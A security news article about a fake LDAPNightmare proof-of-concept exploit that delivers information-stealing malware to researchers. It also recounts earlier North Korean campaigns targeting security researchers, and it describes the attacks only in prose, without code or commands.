Security pros baited with fake Windows LDAP exploit traps

Security researchers are once again being lured into traps by attackers, this time with fake exploits of serious Microsoft security flaws.

Trend Micro spotted what appears to be a fork of the legitimate proof-of-concept (PoC) exploit for LDAPNightmare, initially published by SafeBreach Labs on January 1. But the "forked" exploit PoC actually leads to the download and execution of information-stealing malware.

LDAPNightmare is the name of the PoC for CVE-2024-49113, a 7.5-severity denial-of-service bug in LDAP patched in Microsoft's December Patch Tuesday.

It was one of two LDAP bugs – the other being the critical CVE-2024-49112 – addressed in Microsoft's final updates of 2024. Trend Micro researcher Sarah Pearl Camiling said that "both vulnerabilities were deemed as highly significant due to the widespread use of LDAP in Windows environments," and thus of keen interest to defenders.

In the counterfeit PoC, the legitimate version's Python files were replaced with an executable called "poc.exe." If a user ran this, it would instead drop a PowerShell script, which then downloaded and executed another script from Pastebin, collecting various data points from the user.

The stolen data included:

• Information about the user's PC

• Process list

• Directory lists (Downloads, Recent, Documents, and Desktop)

• Network IPs

• Network adapters

• Installed updates

Camiling noted that for experienced researchers, the bait scheme should have raised suspicions given that an executable was sitting inside a Python project. She didn't specify whether anyone had mistakenly fallen for it.

"Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims," she blogged.

CVE-2024-49112, the more severe of the two LDAP vulnerabilities patched in December, received the highest severity score (9.8) in the 72-patch bundle, making it, and by association CVE-2024-49113, the vulnerabilities of note for security pros and sysadmins.

It's the latest of many attempts to beat researchers at their own game. On multiple occasions, North Korean attackers have attempted to target security researchers using various tactics.

For example, Google's Threat Analysis Group (TAG) noted in a 2021 report that state-sponsored miscreants were even burning zero-days to bust in and peer on those working on new vulnerabilities.

Rapid7 called it a "highly sophisticated attack" that followed others targeting experts at major vendors such as SonicWall, VMware, Mimecast, Malwarebytes, Microsoft, Crowdstrike, and SolarWinds.

One of the victims, Alejandro Caceres, founder of Hyperion Gray, told The Register about the "holy fuck" moment of realizing he'd been pwned by North Korea.

• Microsoft holds last Patch Tuesday of the year with 72 gifts for admins
• Why the long name? Okta discloses auth bypass bug affecting 52-character usernames
• Chinese spies spent months inside aerospace engineering firm's network via legacy IT
• What a glimpse inside the Black Hat NOC reveals about infosec pros' security habits

According to Caceres' account of the ordeal, someone using the name James Willy approached him on social media about working together on a zero-day vulnerability and only after submitting an analysis of it did he realize the Visual Studio project sent over was backdoored.

He said: "When I read the Google thing, I honestly think I said out loud 'holy fuck,' I thought it was insane. Attacked by a nation-state? Me!?"

Kim's cunning attackers were back at it in 2023 too, again using social media deception and burning zero-days in popular software to relay information about a target's PC back to home base.

They also hosted what seemed to be a legitimate Windows debugging tool on GitHub, which instead served as a vehicle for executing malicious code on unsuspecting users' machines. ®